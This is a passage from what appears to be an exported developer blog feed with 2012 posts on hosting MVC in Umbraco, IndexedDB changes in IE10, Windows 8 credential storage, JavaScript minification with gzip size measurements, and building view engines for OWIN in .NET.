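    new { controller = "Home", action = "Index", id = UrlParameter.Optional } // Parameter defaults
);
```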
Finally I have an idea on how to make the route registration simpler and more unobtrusive and I’ll post a follow up blog post.\nCreating a controller and viewsSo I’m going to go ahead and create a really basic controller:\nusing System.Web.Mvc; namespace WebApplication1.Controllers { public class HomeController : Controller { public ActionResult Index() { return View(); } } } This is just a standard MVC controller, go as nuts with it as needed. Now we’ll add the view:\n@{ Layout = null; ViewBag.Title = "Home"; } <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>@ViewBag.Title</title> </head> <body> <h1>Hello I'm a razor view.</h1> </body> </html> Note: This view is stupidly simple, but this is just a proof of concept :P.\nNote #2: You may not get the nice Visual Studio menu options for creating contollers and views, you also might find that the razor file has a lot of red squigglies, when this happens it’s because your Visual Studio project type is not an MVC project, there’s a GUID you can change in the csproj file but I’ll leave that to you to experiment with.\nWe’re just about ready to host our MVC application!\nWeb.config for allIn this demo, because I used NuGet I’m using MVC 4.0 which also means you have Razor 2.0, this means we need to do some changes to the Umbraco web.config file to support this.\nChange #1\nYou need to add your own Web.config for the MVC views, this will reside at /Views/Web.config in your project. The easiest way to get the contents is to grab it from a new MVC project. If you do that you need to remove a part though, as Umbraco already has some Razor support it will want to take over for the MVC side as well. Because of this you need to remove this part:\n<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> </sectionGroup> This section is actually defined in the Umbraco Web.config for Razor support so declaring it a second time will result in an error.\nChange #2\nAs I said I’m using MVC 4.0 here which also uses Razor 2.0 and because of this we need to convert Umbraco up to Razor 2.0. So you’ll need to identify the above mentioned config section in the Umbraco web.config and change the Version=1.0.0.0 to Version=2.0.0.0.\nDone!Yep with that all completed you’re done, you can now route to your MVC application side-by-side with your Umbraco CMS pages.\nConclusionSo over the course of this blog post we’ve looked at how you can get a MVC application working along with an Umbraco CMS in the same IIS/ website. 
There’s a few things to remember:\nWe’re using MVC for the application side of our website only\nUmbraco is still handling all the content pages and you have to use traditional Umbraco practices (you know, like Razor!)\nYou don’t have Umbraco content on the MVC pages but you have the Umbraco API so you could always do calls to get editor data\nThis was a proof-of-concept, implement it at your own risk\n", "id": "2012-06-12-using-mvc-in-umbraco-4" }, { "title": "IndexedDB changed in IE10 PP6", "url": "https://www.aaron-powell.com/posts/2012-06-04-indexeddb-changed-ie10pp6/", "date": "Mon, 04 Jun 2012 00:00:00 +0000", "tags": [ "indexeddb", "javascript", "ie" ], "description": "A subtle change to IndexedDB in IE10 PP6", "content": "When building Pinboard for Windows 8 I decided to use IndexedDB as the internal storage for the application since I was writing it using WinJS.\nInitially I wrote the application against the Consumer Preview release but when it came time to get it going for the Release Preview I hit a snag, the database layer was completely falling over! I kept getting an InvalidAccessError every time I tried to open a transaction. My code was looking like this:\nvar transaction = db.transaction('my-store', IDBTransaction.READ_WRITE); I couldn’t work out what was going wrong here, I hadn’t changed my code and reading the spec at the time everything looked exactly right…\nWatch out for fluid specs!\nWhat I hadn’t noticed was that there was a new version of the IndexedDB spec in the works and in this spec the IDBTransaction enum had been dropped in favour of string representations of the transaction types and IE10 was implementing this spec.\nSo I had to update all my code to remove the enum values in favour of string values:\nvar readOnlyTransaction = db.transaction('my-store', 'readonly'); var readWriteTransaction = db.transaction('my-store', 'readwrite'); This spec is now the current version and most of the browsers have moved to using it (although Chrome still insists on having the enum available it just raises a warning if you use it) so you’re code should work once updated.\nTL;DRYou should use my library, db.js, to simplify your interaction with IndexedDB across the different browsers.\n", "id": "2012-06-04-indexeddb-changed-ie10pp6" }, { "title": "Storing credentials in Windows 8", "url": "https://www.aaron-powell.com/posts/2012-06-04-storing-credentials-windows-8/", "date": "Mon, 04 Jun 2012 00:00:00 +0000", "tags": [ "windows8" ], "description": "", "content": "So you’re building a Windows 8 application and you want to authenticate against an external service. For this it’s likely that you’re going to want to store a username and password for the user so that you can query off to the external service without bugging them constantly.\nThis was something that I had to do for my Pinboard for Windows 8 application so I wanted to make sure that I was doing it above board and no one would think I’ve been sneaky and abused their privacy.\nAccessing credentialsLuckily Windows 8 provides you a nice and easy way which you can store the credentials your application has. I’ll admit that I’ve not done a lot of desktop application development so this may not be that new but hey it’s new to me and new for WinJS :P. 
The way you interact with the credentials is through the Windows.Security.Credentials.PasswordVault class and it’s shockingly simple to do:\nvar resourceKey = 'My app key'; var passwordVault = new Windows.Security.Credentials.PasswordVault(); var credentials = passwordVault.findAllByResource(resourceKey); First off you need to create a resource key for your application; this is an identifier for your application’s credentials. The FindAllByResource method will provide you with all the credentials you’ve stored, you can then filter this down as required to find the particular user you’re after.\nOnce you have the username you can retrieve the password since the password won’t be provided in a usable form initially (I’m guessing for security reasons) so you have to explicitly request it:\nvar user = passwordVault.retrieve(resourceKey, credentials[0].userName); This user object will have a password property that you can do whatever you need with.\nWhere it gets ugly It’s the first time a user installs your application so you won’t have any credentials. You want them to log in before you can do anything right? That makes sense so you check to see if there is a user:\nvar resourceKey = 'My app key'; var passwordVault = new Windows.Security.Credentials.PasswordVault(); var credentials = passwordVault.findAllByResource(resourceKey); if (credentials.length) { //we've got a credential } else { //no credentials yet } Right? Wrong.\nWhere you’d expect to get an empty credential store for your resource you actually get… an exception! That’s right, the code you’ll actually need looks more like this:\nvar resourceKey = 'My app key'; var passwordVault = new Windows.Security.Credentials.PasswordVault(); var credentials; try { credentials = passwordVault.findAllByResource(resourceKey); //we've got a credential } catch (e) { //no credentials yet } Le sigh… I haven’t found any better way to do this other than trying to get all credentials using the retrieveAll method but that implies that it gets back all credentials regardless of the resource key, which is the very thing we want to use to identify our application.\nStoring credentials Once we get past the oddity of try/ catch driven development it’s worthwhile thinking about storing credentials. Turns out that this is also really easy to do:\nvar creds = new Windows.Security.Credentials.PasswordCredential(resourceKey, username, password); passwordVault.add(creds); Now your store is updated and what’s also cool is that you can access them from Windows 8 itself. If you navigate to Control Panel\User Accounts and Family Safety\Credential Manager you’ll see your newly stored credentials:\nAnd there we go, all stored securely inside the Windows security store. The other cool thing about this is that it allows credentials to roam between devices, I haven’t been able to put this to the test yet though as I only have one machine with Windows 8 on it so roaming isn’t all that viable!\nConclusion Storing credentials in Windows 8 is so simple but it has some strangeness about it.
Your main point of call is the PasswordVault class, part of the Windows 8 runtime, which gives you a simple programming interface into the Windows security store.\n", "id": "2012-06-04-storing-credentials-windows-8" }, { "title": "Pinboard for Windows 8", "url": "https://www.aaron-powell.com/posts/2012-06-01-pinboard-for-win8/", "date": "Fri, 01 Jun 2012 00:00:00 +0000", "tags": [ "windows8" ], "description": "A Windows 8 application for the Pinboard bookmarking service", "content": "With the release of the Windows 8 store today I’m excited to say that you can now download my Pinboard for Windows 8 application!\nA few months ago Tatham pointed me to a bookmarking service called Pinboard which is described as antisocial bookmarking, and is aimed at being a super simple bookmarking service, it’s no fuss, no bells-and-whistles, it’s just a bookmarking service.\nWhen I first started using Windows 8 I really wanted to be able to interact with my bookmarks, particularly when I was using IE10 Metro. Since IE10 Metro is a plugin-free browsing experience I wouldn’t have a plugin like Chrome so how was I going to manage my bookmarks?\nSince Windows 8 aims to have seamless integration between different applications I wanted to leverage this, in particular I wanted to use the Sharing Target capabilities. Also I wanted to be able to quickly find different bookmarks again Windows 8 provides a good way to do search that can integrate with your application.\nSo if you’ve got a Pinboard account (and if you don’t you should switch to using it!) grab my application and get bookmarking :D.\n", "id": "2012-06-01-pinboard-for-win8" }, { "title": "Understanding compression and minification", "url": "https://www.aaron-powell.com/posts/2012-05-29-understanding-compression-and-minification/", "date": "Tue, 29 May 2012 00:00:00 +0000", "tags": [ "javascript" ], "description": "An look into what is involved in JavaScript compression and minification as well as where the benefits lie.", "content": "One of my colleagues raised a question on our internal discussion system as to why we should use minified JavaScript libraries. Now I’m sure everyone knows that you should minimize your libraries but do you really understand what the different levels of minification are and the benefits of the different levels? While I strongly recommend that you should ensure that on a production system you always have your JavaScript minified and gzipped (well and the right caching headers but that’s beyond the scope of this blog post) let’s have a look as to exactly what differences it makes.\nFor the exercise I decided that I would take the jQuery 1.7.2 release as it’s a very common JavaScript library and it’s very well written and formatted. I’m going to use the unminified version to run the steps against. For the minification I’ve decided to use uglify js which is toting itself as the best library for minification, it’s also got a pretty nice API so I can work with it programmatically. Lastly I’ve got a tiny Node.js application running Express.js that is serving out the files.\nServing the raw fileLet’s start by looking at serving a completely raw file, the jQuery development release and if we request our file we’ll see something like this as the response headers:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript Content-Length: 327171 Connection: keep-alive So the raw request is coming back at 327171 bytes which is pretty large. From a production point of view you wouldn’t exactly want to do this everytime. 
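As a rough approximation of that Express setup (a sketch using today's express and compression packages, not the exact code from back then):

```javascript
const express = require('express');
const compression = require('compression');
const path = require('path');

const app = express();

// Toggling this line is the difference between the raw response and the
// gzipped one compared below.
app.use(compression());

// Serve the unminified jQuery 1.7.2 build used for the measurements.
app.get('/jquery.js', (req, res) => {
  res.sendFile(path.join(__dirname, 'jquery-1.7.2.js'));
});

app.listen(3000);
```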
Let’s turn on gzip for this same request and see what happens:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 78390 Content-Type: application/javascript Connection: keep-alive Now that I’ve turned on gzip compression our request is already down to 78390 bytes, this is a pretty drastic reduction already and all we’ve done is turn on compression. But we’re not really getting the most our of our response, gzipping is good, it takes care of common parts of our code, the function keyword, whitespace, etc, but there’s still more we can get out of this.\nStripping commentsComments are useful in your codebase but do you really need to send them down to the user? Probably not. So let’s strip them out before sending our response and see what impact this has. For this I’m going to use uglify.js and rebuilt the AST from our original source. I’m going to maintain the structure of our code so we’re going to have a bunch of whitespace still, it wont be exactly what jQuery originally had since we’ve had to rebuild the codebase from the AST but at least our code would still be useful if we want to step through. If we take a look at the first few lines of the file it looks like this:\n(function(window, undefined) { var document = window.document, navigator = window.navigator, location = window.location; var jQuery = function() { var jQuery = function(selector, context) { return new jQuery.fn.init(selector, context, rootjQuery); }, _jQuery = window.jQuery, _$ = window.$, rootjQuery, quickExpr = /^(?:[^#<]*(<[\\w\\W]+>)[^>]*$|#([\\w\\-]*)$)/, rnotwhite = /\\S/, trimLeft = /^\\s+/, trimRight = /\\s+$/, rsingleTag = /^<(\\w+)\\s*\\/?>(?:<\\/\\1>)?$/, rvalidchars = /^[\\],:{}\\s]*$/, rvalidescape = /\\\\(?:["\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g, rvalidtokens = /"[^"\\\\\\n\\r]*"|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g, rvalidbraces = /(?:^|:|,)(?:\\s*\\[)+/g, rwebkit = /(webkit)[ \\/]([\\w.]+)/, ropera = /(opera)(?:.*version)?[ \\/]([\\w.]+)/, rmsie = /(msie) ([\\w.]+)/, rmozilla = /(mozilla)(?:.*? rv:([\\w.]+))?/, rdashAlpha = /-([a-z]|[0-9])/ig, rmsPrefix = /^-ms-/, fcamelCase = function(all, letter) { return (letter + "").toUpperCase(); }, userAgent = navigator.userAgent, browserMatch, readyList, DOMContentLoaded, toString = Object.prototype.toString, hasOwn = Object.prototype.hasOwnProperty, push = Array.prototype.push, slice = Array.prototype.slice, trim = String.prototype.trim, indexOf = Array.prototype.indexOf, class2type = {}; jQuery.fn = jQuery.prototype = { constructor: jQuery, As I said this isn’t exactly what the jQuery source looked like since we’ve removed more whitespace but it’s close and most importantly it’s readable.\nNow let’s look at the headers:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 254399 Connection: keep-alive If we compare that to the original we’ve gone down to 254399 bytes. Cool even with that we’ve dropped a good bit of weight from our response. 
Now let’s also gzip it:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 48566 Content-Type: application/javascript Connection: keep-alive Again we’re getting some better performance because we don’t have the comments which don’t compress as well as say whitespace and a slightly more organised codebase.\nMangling our codeOne of the most common things that a minifier will do is obfuscate your code, variables, functions, etc will all be renamed into smaller versions so that you have smaller files by having smaller names. Obviously this makes your code a whole lot harder to read (hence obfuscation) but it does do wonders for file size. Again we’re going to get uglify.js to help us out so let’s have a look at the first few lines again:\n(function(a, b) { function h(a) { var b = g[a] = {}, c, d; a = a.split(/\\s+/); for (c = 0, d = a.length; c < d; c++) { b[a[c]] = true; } return b; } Well that’s quite different now isn’t it! You’ll see from the very first line in the original version we had two arguments window and undefined, these are now called a and b, the body has also been rewritten so that there’s a different order for the code, functions are now at the top, the first being a function called h. Here’s the original function that is now the h function:\nfunction createFlags(flags) { var object = flagsCache[flags] = {}, i, length; flags = flags.split(/\\s+/); for (i = 0, length = flags.length; i < length; i++) { object[flags[i]] = true; } return object; } As you can see the use of smaller variable names and this is done because the variables are never needed by any consumer of the API, so renaming object to b wont be a problem because anyone who knew it was object has also had their references updated. So what’s the impact on size?\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 213222 Connection: keep-alive If we compare this back to the last request you’ll see that it’s only slightly smaller, but this is the advantage of using minimal variable names (and keep in mind we still have whitespace). And now we’ll try gzipping it:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 42854 Content-Type: application/javascript Connection: keep-alive Again we’re not really that might smaller than just the comment stripped version but we are shrinking our response down.\nOptimising the codebaseAlthough variable minification can do good things to getting your files smaller you can get even more out of it if you’re smart about your codebase, in this stage we’re looking at tricks of the JavaScript language that you won’t want to actually write but are useful when you’re trying to get smaller files. Things like utilising the comma operator can be useful for chaining together statements and removing unreachable code are something best left to the machines, you can easily introduce errors into your JavaScript if you’re not careful. Let’s run this over our codebase:\n(function(a, b) { function h(a) { var b = g[a] = {}, c, d; a = a.split(/\\s+/); for (c = 0, d = a.length; c < d; c++) b[a[c]] = !0; return b; } Well now that is looking rather different isn’t it. You’ll see that there’s some interesting tricks that have been applied, in particular the use of !0. Fascinating how you can exploit JavaScript boolean operations isn’t it. 
If you're unsure of what this is doing: in JavaScript 0 is a falsey value, meaning that JavaScript will treat 0 as false, but it's not actually false (0 === false returns false). Putting a ! operator in front of it forces the value to be converted to an actual boolean by returning the inverse, and !0 === true. Like I said, fascinating.\nSo what's it do for our response size (keep in mind we still have whitespace maintained):\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 155600 Connection: keep-alive Well that's looking good, we've really dropped the size nicely, and if we gzip it:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 39185 Content-Type: application/javascript Connection: keep-alive Almost there! It's getting pretty small right there ey!\nPutting it all together\nWe've pretty much run through all of the different steps to get our responses down, and we've seen the impact of each step, but let's roll it all together and also strip off the whitespace:\nHTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/javascript; charset=utf-8 Content-Length: 94656 Connection: keep-alive So if we drop the whitespace we drastically reduce the size of our library, but our code is next to impossible to step into if we need to debug it. That's fine for a production system though, you really shouldn't be debugging through it. So what if we turn on gzipping this time? We've already removed the whitespace, the biggest waste of space in our response, so can we really get as much from gzipping?\nHTTP/1.1 200 OK X-Powered-By: Express Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 33632 Content-Type: application/javascript Connection: keep-alive Sweet, we've still got a really good level of compression against our library, down to just 33632 bytes for jQuery.\nSize Matters\nNow that we've seen how we get to the end goal, an ultra-small version of our JavaScript library, we should answer the question of why. The simplest answer to the question is speed: by having a smaller file (~30kb vs ~350kb) we can send it down from the server a lot quicker. This is especially important when you're looking at this from a mobile point of view, where you've got a limited bandwidth allowance, so you want to be able to send it down as quickly as possible.\nBut what about from the point of view of high-speed network connections, is file size really that important if you're transmitting over ADSL2 or something? Well yes, it still matters; even if you can download the file fast you can download smaller files even faster, and that will have an impact on the overall speed of your application. The faster all dependencies are loaded, the faster your application becomes responsive to the end user.\nThe other main reason to ensure that your files are as small as possible is caching. Again this is most important from a mobile browser point of view but it's still very valid with desktop browsers. Mobile browsers have fairly limited cache allowances. Yahoo! did a blog post in which they looked at the allowances for the different mobile devices (although it's a bit out-of-date) and you can see from that that you've not got a lot of room to play with, so the better packed your files are the safer you'll be in cache. 
Desktop browsers are a lot more flexible since you can change their cache allowances and they also have higher starting levels.\nConclusion\nSo you've seen throughout this blog exactly what goes into the minification of JavaScript libraries, what the different minification concepts bring to the table and ultimately just why you should minify and gzip your libraries in production. Keep in mind that there's more to performance that I haven't covered, such as caching, but there's plenty of articles out there that can help you with that ;).\n", "id": "2012-05-29-understanding-compression-and-minification" }, { "title": "OWIN series conclusion", "url": "https://www.aaron-powell.com/posts/2012-04-10-owin-conclusion/", "date": "Tue, 10 Apr 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "Wrapping up the OWIN series", "content": "Over the last few weeks I've done a small series of blog posts looking at the Open Web Interface for .NET, aka OWIN.\nThe series was made up of:\nA Hello World introduction\nIntroducing middleware\nRouting\nResponses\nView Engines in both simple and advanced forms\nA github repository with all the code\nI started looking at OWIN after bitching at Damian Edwards over the poor documentation and he told me to stop bitching and work it out. So I did, and while doing it I thought I'd do my best to contribute back so that others have a better starting point.\nMajor take away points\nI had a lot of fun playing with OWIN but most importantly I think I've learnt a thing or two and here are my major take away points from the last few weeks:\nLearn your web stack. This is something that I found really important; while WebForms is a very high level abstraction on the web, MVC has really changed that, it's quite close to the wire. But even then it's sometimes not close enough. I've worked on projects where we've had to work around the gates put up by MVC to protect developers from doing something really stupid, so sometimes you want something else. I can see where OWIN would fit in there, especially if you combine it with something like Nancyfx; you can still get all the ASP.Net powers but also skip around it when required.\nMiddleware is your friend. Sure I'd done middleware before, but I've always been interested in how you'd approach it in .NET. JavaScript is a very nice language, especially when it comes to functional-esque programming, so being able to try a similar idea in .NET and compare the experience was interesting. Generics and delegates can be a bitch in .NET, but it's generally a problem you won't have to face.\nYou don't need everything up front. While it may seem very convenient that I had a series of blogs that expanded on the ideas of the ones before it, that was initially an accident. I started with the intention of just doing the first post but as I wrote the code out I could see it evolving. I didn't even think about a View Engine until I'd already exhausted the routes and response sections, both of which somewhat relied upon an understanding of middleware. You can easily cut out sections of the series if you don't need an application that has a View Engine (say a RESTful service). Modularity is power; it's something that the Node.js and Ruby guys have known for a long time, but projects like OWIN are making it more accessible in .NET.\nWrapping up\nHopefully you've enjoyed the journey too and learnt a thing or two along the way. 
This series has by no means been an extensive dive into all parts of OWIN; I'll freely admit there's things I ignored as I didn't think them interesting enough (like how do you serve out statics like CSS and JavaScript?) and there's other things that I didn't even work out (like how Firefly works!). My goal was to give anyone who wants to play with OWIN a starting location and I think I've done that.\n", "id": "2012-04-10-owin-conclusion" }, { "title": "OWIN and View Engines, Part 2", "url": "https://www.aaron-powell.com/posts/2012-04-02-owin-view-engines-part-2/", "date": "Mon, 02 Apr 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "Taking the View Engine concept one step further", "content": "In the last post we had a bit of a look at View Engines for OWIN and in this one I want to take the idea just a little bit further.\nMost web frameworks you come across will allow you to choose your own View Engine. ASP.Net MVC allows for this (although it can be tricky) and frameworks like Express.js or Nancy make it quite easy to drop in your own one.\nYou may be wondering why you would want to do this? Apart from the “because you can” and “freedom of choice” reasons there is a slightly more valid reason. Most view engines, while being generic, often have a level of speciality to them; the developers who write them don't know about every scenario you'd want to use them in. Let's say you're a Node.js programmer who has a love for CoffeeScript. You might want to use the CoffeeKup View Engine since it allows you to write in your native language (I don't want to debate the merits of this, it's a valid scenario) but the problem with CoffeeKup is it can't do XML (at least the last time I used it it couldn't). This may not be that big a deal for the majority of your application, but what if you've got an RSS feed? Well then you can't really expose that through your chosen View Engine, so you'd want to be able to change to a different View Engine for that specific route.\nTeasing out our View Engine\nThe first step to making our View Engine more extensible is to pull out an interface from the RazorViewEngine we have:\npublic interface IViewEngine { string Parse(string viewName); string Parse<T>(string viewName, T model); } Now I would just have to implement that interface to create a View Engine and not take a dependency on Razor at all.\nYou obviously want to update the other references to RazorViewEngine to just be the interface, such as on our singleton and generic argument constraints. Now everywhere we'll just deal with the interface and never the concrete class.\nEnabling multiple View Engines\nEssentially what we're doing here is enabling multiple View Engines and I'm going to do this via two methods on my ViewEngineActivator called RegisterViewEngine and ResolveViewEngine:\npublic static void RegisterViewEngine(string viewEngineId, Func<IViewEngine> viewEngineActivator) { throw new NotImplementedException(); } public static IViewEngine ResolveViewEngine(string viewEngineId) { throw new NotImplementedException(); } I'm choosing to do a lazy invocation of the View Engine, meaning that you provide a function to create it rather than a created instance. The reason I've done this is just so we don't create it until we actually require it. But because I only want to create it once anyway I'm going to store the created View Engine once the function executes. 
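As an aside, if you're happy to lean on .NET 4's Lazy<T> you can get that same create-once-on-first-use behaviour with a bit less ceremony. A rough sketch (minus the argument checking) would be:

```csharp
// hypothetical alternative: Lazy<T> handles the "create on first use, then cache" part for us
private static readonly Dictionary<string, Lazy<IViewEngine>> viewEngines =
    new Dictionary<string, Lazy<IViewEngine>>();

public static void RegisterViewEngine(string viewEngineId, Func<IViewEngine> viewEngineActivator)
{
    viewEngines.Add(viewEngineId, new Lazy<IViewEngine>(viewEngineActivator));
}

public static IViewEngine ResolveViewEngine(string viewEngineId)
{
    return viewEngines[viewEngineId].Value; // the factory runs on first access only
}
```

I'm going to keep it hand-rolled here though, so the mechanics stay visible.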
For storage I’m going to maintain a private variable like so:\nprivate static Dictionary<string, Tuple<Func<IViewEngine>, IViewEngine>> viewEngines = new Dictionary<string, Tuple<Func<IViewEngine>, IViewEngine>>(); And now we’ll update our registration method:\npublic static void RegisterViewEngine(string viewEngineId, Func<IViewEngine> viewEngineActivator) { viewEngines.Add(viewEngineId, new Tuple<Func<IViewEngine>, IViewEngine>(viewEngineActivator, (IViewEngine)null)); } As I said I’m staging the instance until it’s needed so inside the tuple I’m just storing a null value. You’ll also have noticed that I’m passing in an ID for the View Engine, this is so we can easily find it later on.\nNow we’ll go ahead and implement our resolution method:\npublic static IViewEngine ResolveViewEngine(string viewEngineId) { if (string.IsNullOrEmpty(viewEngineId)) { throw new ArgumentNullException("viewEngineId", "A ViewEngine ID needs to be provided for resolution"); } if (!viewEngines.ContainsKey(viewEngineId)) { throw new KeyNotFoundException(string.Format("The ViewEngine ID {0} has not been registered, ensure it is registered before use", viewEngineId)); } var engine = viewEngines[viewEngineId]; if (engine.Item2 == null) { var activator = engine.Item1; engine = viewEngines[viewEngineId] = new Tuple<Func<IViewEngine>, IViewEngine>(activator, engine.Item1()); } return engine.Item2; } What we’re doing here is:\nEnsuring that we are being provided an ID for the View Engine and that it does exist in the store Pulling out the tuple If we haven’t created the View Engine yet (stored in Item2) we’ll create it Return the View Engine Now I need to make a way to register each View Engine. You can do this by accessing the ViewEngineActivator itself but that’s not quite as fluent when you’re working with the IAppBuilder so we’ll chuck an extension method on there:\npublic static IAppBuilder RegisterViewEngine(this IAppBuilder builder, Func<IViewEngine> viewEngine, string viewEngineId) { ViewEngineActivator.RegisterViewEngine(viewEngineId, viewEngine); return builder; } Noting really special with this other than making our API read nicely:\nbuilder .DefaultViewEngine<RazorViewEngine>() .RegisterViewEngine(() => new XmlViewEngine(), "xml") // and so on Accessing the right View EngineSo we’ve seen how to get a View Engine by an ID but we want to make it easier. Generally speaking you’re going to be only using a single View Engine for most of your routes. To this end I want to have a default View Engine which will be loaded up, which is what our singleton was doing for us before; I’m going to rename it to DefaultViewEngine to make it more discoverable and change it from being a standard get/ set to look like this:\npublic static IViewEngine DefaultViewEngine { get { if (defaultViewEngine == null) defaultViewEngine = ResolveViewEngine("defaultViewEngine"); return defaultViewEngine; } set { defaultViewEngine = value; } } Now I’ve got a backing field and I’m also going to be working under the assumption that there’s a View Engine called defaultViewEngine. 
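To make that assumption concrete, somewhere in your startup code there needs to be a registration under that ID, something like this (presumably it's also all that the DefaultViewEngine<RazorViewEngine>() call in the fluent example above would be doing under the hood):

```csharp
// register the engine that the DefaultViewEngine property will resolve on first use
builder.RegisterViewEngine(() => new RazorViewEngine(), "defaultViewEngine");
```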
This means that you can set it as before, or alternatively set it through lazy loading (which the if condition will take care of).\nUsing an alternate View Engine\nWe've made it possible to specify a default View Engine and to register alternate View Engines, so let's look at how to use them.\nThere's two ways you could go about this: you could either add a new parameter to the route registration which is the View Engine to use, or you can put it on the actual call to the View Engine. Personally I like approach two more as the View Engine isn't really related to the route but to the route handler, and it also means that as I want to do some overloads for the route methods it's not going to mean a lot of duplicate code (which is the same reason that we went with the View extension method to begin with, if you remember).\nThis gives us an extension method like this:\npublic static void View(this Response res, string view, string viewEngineId) { var viewEngine = ViewEngineActivator.ResolveViewEngine(viewEngineId); var output = viewEngine.Parse(view); res.ContentType = "text/html"; res.Status = "200 OK"; res.End(output); } (And I'll leave the model-based one to your imagination)\nIt's pretty simple as you can see, mostly just a set of pass-through method calls, and it means our handler could look like:\n.Get("/foo", (req, res) => { res.View("foo", "fooEngine"); }) While it's true I'm hard-coding text/html as the content type, that's something you can change yourself, or even make it so that the View Engine knows more about the content type that is being returned; I'll leave those as your exercises.\nConclusion\nThis wraps up our look at View Engines; we've seen how to create something simple to support a single View Engine and then expanded on the concept to enable us to use a different View Engine if and when required.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-04-02-owin-view-engines-part-2" }, { "title": "OWIN and View Engines", "url": "https://www.aaron-powell.com/posts/2012-03-23-owin-view-engines/", "date": "Fri, 23 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "A look at how you'd put together a View Engine for OWIN.", "content": "In the last post we looked at improving our responses in OWIN by adding some extension methods to the response object, and the next logical step for this is to think about HTML. While what we've brought together thus far is useful if you're creating something that is just a web API, if you want to create an actual web site you probably need to respond with some HTML.\nTo this end we're going to need to think about creating a View Engine that will be responsible for our HTML generation. The reason I want to go down this path is it makes it nicer if we want to add some level of dynamic data to the HTML we're serving, say to insert a user name or other things like that.\nPicking our language\nHTML isn't a language that has dynamic features to it so we need to look at a templating language to leverage for this. If you look around there's plenty of different HTML templating languages like HAML, Spark, Jade or even Razor.\nSince I want to make it something easy to understand for the .NET developer I'm going to use Razor as my templating language, and I'm going to use the RazorEngine project to help me out (it saves me writing all the bootstrapping code).\nApproaching the View Engine\nSo we're going to use Razor, but how are we going to use it? 
We need some way to “create” our View Engine and then we will want to interact with it.\nSince the View Engine could be a little bit complex I’m going to create a class which will represent the engine. This will also mean that I can do some caching within the View Engine to ensure optimal performance.\nWith that in mind how are we going to interact with the View Engine? We obviously don’t want to spin it up every single time, instead I want it to always be available. So this means that I’m going to have a static that lives somewhere which I’ll want to interact with.\nFinally how will we get that View Engine instance? Do we have it magically created or do we want it lazy-loaded?\nThese are all things to be considered but my approach is going to be:\nUse a singleton for the View Engine Have a ViewEngineActivator which we access it through The user must explicitly register the ViewEngine they want to use in code Coding the View Engine Thinking about the View Engine there’s not a lot that the class would have to publicly expose, in fact I really think you only want two methods, one that takes a view name, one which takes a view name and a model.\nSo the View Engine will look something like this:\npublic class RazorViewEngine { public string Parse(string viewName) { return Parse<object>(viewName, null); } public string Parse<T>(string viewName, T model) { throw new NotImplementedException(); } } Cool that’s not very complex, let’s start on the activator:\npublic static class ViewEngineActivator { public static RazorViewEngine ViewEngine { get; set; } } And now we’ll make it possible to register a View Engine:\npublic static IAppBuilder UseViewEngine<TViewEngine>(this IAppBuilder builder) where TViewEngine: RazorViewEngine, new() { ViewEngineActivator.ViewEngine = new TViewEngine(); } /* snip */ builder.UseViewEngine<RazorViewEngine>(); Now that the infrastructure code is all there we need to think about how we would go about reading in the views and turning them into something we can send down as a response. In our View Engine we’re going to need to know where to find the views. I like conventions so I’m going to expect them to be in the views folder at the application root. But I’m a nice guy so I think it should be possible to put the views into another folder if you desire so I’ll add some constructors like so:\npublic RazorViewEngine() : this("views", "_layout") { } public RazorViewEngine(string viewFolder, string layoutViewName) { ViewFolder = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, viewFolder); LayoutViewName = layoutViewName; if (!Directory.Exists(ViewFolder)) throw new DirectoryNotFoundException("The view folder specified cannot be located.\\r\\nThe folder should be in the root of your application which was resolved as " + AppDomain.CurrentDomain.BaseDirectory); } I’m also going to check to make sure that the views folder does exist. 
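One thing the later code leans on but that I haven't shown is the view cache itself, so assume a field along these lines sitting on the engine:

```csharp
// assumed declaration: the Parse method below reads and writes this cache;
// as noted further down it isn't thread-safe as written, so guard it properly in real code
private static readonly IDictionary<string, string> viewCache = new Dictionary<string, string>();
```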
